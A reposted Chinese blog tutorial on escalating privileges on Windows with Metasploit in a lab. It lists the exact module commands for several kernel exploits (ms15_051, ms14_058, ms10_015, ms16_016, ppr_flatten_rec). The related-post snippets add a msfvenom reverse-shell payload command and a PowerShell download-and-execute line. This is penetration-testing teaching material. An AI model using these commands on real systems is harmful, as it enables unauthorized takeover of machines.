msf利用- windows内核提权漏洞

最新推荐文章于 2023-07-18 10:20:30 发布
最新推荐文章于 2023-07-18 10:20:30 发布
阅读量378 收藏
点赞数
文章标签: 操作系统 shell
原文链接:http://www.cnblogs.com/-qing-/p/10609714.html
版权

 windows内核提权漏洞

 

环境:

Kali Linux(攻击机) 192.168.190.141

Windows2003SP2(靶机) 192.168.190.147

 

 

 

0x01寻找可利用的exp

实战中我们在拿到一个反弹shell(meterpreter)下一步会进行提权操作,而metaspolit的内置模块Local Exploit Suggester。这个模块可以帮助我们识别系统存在哪些漏洞可以被利用,并且为我们提供最合适的exp,通过这个exp我们可以进一步提权。

如下图,有一个普通用户权限的会话

 

 

 

 

在拿到meterpreter会话的前提下,我们可以利用这个模块进行收集

 

 

 

 

 

 

可以看到我这里有和目标机的一个session会话,id4,我们使用local_exploit_suggester模块

 

 
 
 
  
use post/multi/recon/local_exploit_suggester

 

set LHOST 192.168.190.141

 

set SESSION 1

 

Exploit
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
如下图所示,它自动的为我们匹配出了一些可能的用于易受攻击目标提权的漏洞利用的exp模块。
 
 
 
 
 
0x02 利用exp提权
 
 
根据metaspolit的内置模块Local Exploit Suggester模块列出的可利用模块,我们来进行提权,提权成功后会返回新的、提升权限成功后的session会话。
 
 
选取了几个常见的可利用的模块来进行提权演示。
 
 
 
 
 
Windows ClientCopyImage Win32k Exploit(ms15_051)
Windows内核模式驱动程序中的漏洞让攻击者可以进行提权。
这个模块利用了win32k.sys内核模式驱动程序中不正确的对象处理。
 
 
 
 
 
 
 
 
使用模块 查看设置的参数
 
 
 
 
设置参数 提权
 
 
 
  
use exploit/windows/local/ms15_051_client_copy_image

set lhost 192.168.190.141

set session 4

exploit
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
Windows TrackPopupMenu Win32k NULL Pointer Dereference(ms14_058)
该模块利用了win32k.sys中的NULL Pointer Dereference,这个漏洞可以通过使用TrackPopupMenu来触发。在特定情况下,可以在xxxSendMessage Timeout上滥用NULL Pointer Dereference来获取任意代码执行。
这个模块已经在Windows XP SP3,Windows Server 2003 SP2,Windows7 SP1,Windows Server2008 32位和Windows Server2008R2 SP164位上测试过。
 
 
 
  
use exploit/windows/local/ms14_058_track_popup_menu

set lhost 192.168.190.141

set session 4

exploit
 
 
 
 
 
 
 
 
 
 
 
 
 
 
通过KiTrap0D进行Windows系统提权(ms10_015)
这个模块会通过Kitrap0D这个exp来生成一个SYSTEM权限的新会话,如果当前会话已经是SYSTEM权限,那么这个脚本将不起作用。这个脚本依赖于kitrap0d.x86.dll这个文件,而且不支持64位的Windows操作系统。
该模块已经在存在漏洞的Windows Server 2003,Windows Server 2008,Windows7和XP上测试过,只限32位操作系统。
 
 
 
 
 
 
  
use exploit/windows/local/ms10_015_kitrap0d

set lhost 192.168.190.141

set session 4

exploit
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
mrxdav.sys WebDav本地提权MS16-016
这个exp利用的是mrxdav.sys中的漏洞,漏洞编号是MS16-016。该模块会在目标主机上生成一个进程,并通过在特权进程的环境下执行指定的payload来提权。
该模块在存在漏洞的Windows7 SP1 x86架构上测试过可行。
 
 
 
  
use exploit/windows/local/ms16_016_webdav

set lhost 192.168.190.141

set session 4

exploit
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
EPATHOBJ::pprFlattenRec本地提权
这个漏洞是由于EPATHOBJ::pprFlattenRec使用了未初始化的数据而产生的,该漏洞可以对内存产生破坏。
而我们的这个脚本就是利用这个漏洞来提权的。
 
 
这个模块已经在Windows XP SP3,Windows2003SP1和Windows7SP1上成功执行。
 
 
 
  
use exploit/windows/local/ppr_flatten_rec

set lhost 192.168.190.141

set session 4

exploit
 
 
 
 
 
 
 
 
因为实验是sp2就没有成功
 
 
 
 
 
 
 

 

转载于:https://www.cnblogs.com/-qing-/p/10609714.html

                

        

        




    

  


    

      

        

            

              
                
                  weixin_30273763
                
              
            

            

                关注
              
            

        

        

          
      

      









                



	

		

			

				
					
msfWindows提权

				
			

			

				

					wjq18827615690的博客
				

				

					03-18
					
					284
					
				

			

		

		

			
				
利用msf生成payload获取目标机session


利用msf生成payload(可以获得一个低权限的session)
生成linux木马

msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.42.49 LPORT=5555 -i 3 -f elf -o test

msfvenom -a x86 --platform linux -p linux/x64/meterpreter/..

			
		

	



                

            
              



	

		

			

				
					
权限提升-windows内核溢出漏洞提权

				
			

			

				

					weixin_39430198的博客
				

				

					03-14
					
					1761
					
				

			

		

		

			
				
一、课时目标
1、理解权限提升的原理和目的
2、掌握常规提权的思路和方法
二、权限提升
2.1 什么是提权
提权,就是提高自己在服务器中的权限。比如在windows下从普通用户提升到administrator或者system权限,linux下普通用户提升到root权限。
2.2 为什么要提权
用户的权限决定了其能够访问的资源。在渗透测试中,我们通过某种方式(比如上传webshell)获取到一个执行命令的shell,但它是一个低权限用户,所以不能执行某些系统命令或者访问某些关键系统资源。此时如果我们想要获取更

			
		

	



              


  
              

                


	

		

			

				
					
Linux内核高危漏洞 Linux系统系统可能受攻击,亲自测试

				
			

			

				

					游手好弦 信步涂鸦
				

				

					05-17
					
					1949
					
				

			

		

		

			
				
内核版本:Linux XOK 2.6.18-128.1.6.el5.centos.plus #1 SMP Thu Apr 2 12:53:36 EDT 2009 i686 i686 i386 GNU/Linux马上测试:注意测试中可能导致死机。请不要在生产环境中测试。如果你希望亲手验证此漏洞,你可以下载下列两个代码包测试(有可能导致系统不稳定,当机等现象,后果自负):就下载这个即可

			
		

	





	

		

			

				
					
使用msfvenom 对windows 7 shell

				
			

			

				

					weixin_68281676的博客
				

				

					09-03
					
					552
					
				

			

		

		

			
				
windows提权

			
		

	



		

			
		



	

		

			

				
					
windows7获取会话后的提权操作

				
			

			

				

					weixin_43893278的博客
				

				

					09-18
					
					370
					
				

			

		

		

			
				
利用kali对windows7进行提权

			
		

	





	

		

			

				
					
渗透测试提权指南

				
			

			

				

					遇事不决冲冲冲
				

				

					12-04
					
					7566
					
				

			

		

		

			
				
windows系统提权
参考内网安全攻防:渗透测试实战指南(百度百科)
一.系统内核漏洞
利用已存在未安装补丁的漏洞进行提权
参考Windows系统内核溢出漏洞提权
1.手动寻找缺失补丁
拿到权限后通过如下命令查看系统安装了哪些补丁
systeminfo

wmic qfe get caption,description,hotfixid,installedon

比CMD更强大的命令行:WMIC后渗透利用(系统命令)


通过没有列出的补丁号,寻找相应的提权EXP进行提权(挺离谱的感觉)
系统漏洞与对应的

			
		

	





	

		

			

				
					
利用MSF&CS溢出漏洞提权云服务器windows server2012

				
			

			

				

					weixin_45701675的博客
				

				

					11-16
					
					2337
					
				

			

		

		

			
				
Windows系统内核溢出漏洞提权

溢出漏洞是一种计算机程序的可更正性缺陷。溢出漏洞的全名:缓冲区溢出漏洞。因为它是在程序执行的时候在缓冲区执行的错误代码,所以叫缓冲区溢出漏洞。缓冲溢出是最常见的内存错误之一,也是攻击者入侵系统时所用到的最强大、最经典的一类漏洞利用方式。成功地利用缓冲区溢出漏洞可以修改内存中变量的值,甚至可以劫持进程,执行恶意代码,最终获得主机的控制权。

利用Windows系统内核溢出漏洞提权是一种很通用的提权方法,攻击者通常可以使用该方法绕过系统中的所有安全限制。攻击者利用漏洞的关

			
		

	





	

		

			

				
					
Windows提权--小迪权限提升--烂土豆--DLL劫持--udf提权

				
			

			

				

					z2560088的博客
				

				

					02-13
					
					4395
					
				

			

		

		

			
				
针对环境

windows有两种环境,一种是web网站拿到的webshell环境,一般是低权限的用户,(jsp除外,拿到webshell就是system权限)另一种是本地的环境,可能是服务器为管理某项服务创建的低权限用户。不同环境下的操作会有所不同。

提权方法

1.win溢出漏洞(如何判断类型和利用)

信息收集-补丁筛选-利用 MSF 或特定 EXP-执行-西瓜到手
Vulmap,Wes,WindowsVulnScan 对比,exp 在哪里获取?

利用wes进行补丁筛选



2.数据库提权
...

			
		

	





	

		

			

				
					
牛掰了!黑客手中的利器-Windows提权小结

				
			

			

				

					weixin_55551408的博客
				

				

					03-19
					
					696
					
				

			

		

		

			
				
本节主要针对Windows操作系统下的权限提升进行介绍,提权是后渗透重要的一环节,在权限较低的情况下,站在攻击者的视角进行内部网络安全测试、系统安全测试、应用安全测试等方面会出现“束缚”,所测试出的质量与结果也会不同。本文基于Win操作系统下分别从内核漏洞、权限配置、DLL注入、注册表等方面展开介绍,其中包含漏洞本身的介绍、漏洞复现过程等内容的展现。该提权内容的阅读没有前后顺序,可根据读者自身所需进行全文阅读或某方向内容的阅读。

提权背景

权限提升意味着用户获得不允许他使用的权限。比如从一个普通用户,通

			
		

	





	

		

			

				
					
windows系统提权

					
最新发布

				
			

			

				

					liweh的博客
				

				

					07-18
					
					305
					
				

			

		

		

			
				
1、内核溢出提权windows系统获取补丁: systeminfo或wmic qfe提权辅助工具: Windows-Exploit-Suggester(现在因为漏洞库不再更新,所以已经基本弃用systeminfo在windows系统上可以显示系统的各种信息主机名:           WIN-AJC75HUE5HCOS 名称:          Microsoft Windows Server 2008 R2 Standard。

			
		

	





	

		

			

				
					
Metasploit系列----未知目标测试

				
			

			

				

					bronze_s的博客
				

				

					05-08
					
					448
					
				

			

		

		

			
				
攻击机器:kali 192.168.1.8
目标机器:windows2003 192.168.1.7
操作步骤
创建工作空间
显示数据库未连接

使用msfdb init对数据进行初始化
使用命令db_status查看数据库状态信息,显示数据库已连接。

使用命令workspace -a 192.168.1.7创建目标工作空间。

信息搜集
测试目标连通性:ping 192.168.1.7(ping -c 3 ip :ping三次后结束  和  ping 使用ctrl+c结束)

测试目标服务:在msf中使

			
		

	





	

		

			

				
					
内网渗透-----权限分析及防御

				
			

			

				

					qq_43590351的博客
				

				

					10-20
					
					3172
					
				

			

		

		

			
				
内网权限提升及防御

			
		

	





	

		

			

				
					
内网渗透常用提权方式总结

				
			

			

				

					j1044957016的博客
				

				

					06-01
					
					7766
					
				

			

		

		

			
				
内网菜鸡艰难学习,希望一样的菜鸡能省去打开一堆链接的时间吧


			
		

	





	

		

			

				
					
渗透测试Metasploit框架体验(5.理解MSF后渗透-之提权

				
			

			

				

					weixin_51803729的博客
				

				

					02-12
					
					5330
					
				

			

		

		

			
				
渗透测试Metasploit框架体验(5.理解MSF后渗透-之提权

			
		

	





	

		

			

				
					
Windows内核漏洞利用提权教程

				
			

			

				

					systemino的博客
				

				

					04-19
					
					1500
					
				

			

		

		

			
				
PS. 本文仅限于技术讨论,严禁用于其他用途。

继上一篇“使用自动化脚本进行Windows提权”,本文将介绍有关Windows内核漏洞提权的方法。我将使用内置的Metasploit模块作为演示。通过本文的学习,你将了解系统的哪些部分可被利用,并匹配最佳可利用模块进一步的提升权限。

Windows-Exploit-suggester

Metasploit内置模块提供了各种可用于提权的local...

			
		

	





	

		

			

				
					
2021-10-074号靶场转自y神的学习笔记(net渗透,sockcap,msf多重网段渗透,os-shell,验证码重放,C#解密,wfuzz穷举subdomain)

				
			

			

				

					qq_45290991的博客
				

				

					10-07
					
					2637
					
				

			

		

		

			
				
masscan扫描
kali@kali:~$ sudo masscan -p 1-65535 192.168.0.134 --rate=1000

[sudo] kali 的密码:



Starting masscan 1.0.5 (http://bit.ly/14GZzc...

			
		

	





	

		

			

				
					
内网域渗透分析(实战总结)

				
			

			

				

					kali_Ma的博客
				

				

					10-08
					
					7150
					
				

			

		

		

			
				
一、测试环境搭建
靶场常见的网络拓扑环境如下:

web服务器安装有双网卡,一块网卡连接互联网,一块网卡连接内网,内网里的机器是无法直接连接互联网的。我们使用vmware来模拟上述环境,配置网卡如下:

我们甚至还可以将web服务器的上网网卡NAT改为自定义VMnet3,将攻击机的网卡也改为VMnet3,这样的好处是整个渗透测试过程既保证了网络都是通的,又保证了ip不会发生变化,利于我们持续的作渗透,ip自定义为我们便于记忆数字,提高我们的效率。(有时候6个以上虚拟机同时开着,时不时忘了ip又得来回切换真的

			
		

	





	

		

			

				
					
Windows内核溢出漏洞提权

				
			

			

				

					谢公子的博客
				

				

					02-12
					
					7008
					
				

			

		

		

			
				
目录

内核溢出漏洞提权

实战MSF中CVE-2018-8120模块本地溢出漏洞提权

查看系统补丁

选择利用模块攻击

内核溢出漏洞提权

本地溢出提权首先要有服务器的一个普通用户权限,攻击者通常会向服务器上传本地溢出程序,在服务器端执行,如果系统存在漏洞,那么将溢出Administrator权限。以下是不同系统提权漏洞和相应的补丁。

github上windows系统溢出漏洞提权的汇总...

			
		

	





	

		

			

				
					
windows提权总结

				
			

			

				

					qq_44657899的博客
				

				

					01-15
					
					4383
					
				

			

		

		

			
				
文章目录0x01 使用ms16-032提权
0x01 使用ms16-032提权
exp地址:
https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.8.12/Invoke-MS16-03

			
		

	





	

		

			

				
					
提权实战:MS16-075漏洞利用与Meterpreter反弹

				
			

			

				

					
				

			

		

		

			
				
本次实战笔记记录了一次关于利用MS16-075漏洞进行提权的过程,该漏洞Windows SMB服务器的特权提升漏洞,其CVE编号为CVE-2016-3225。攻击者通过转发其他服务的身份验证请求,能够在SMB服务中触发漏洞,进而实现权限...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值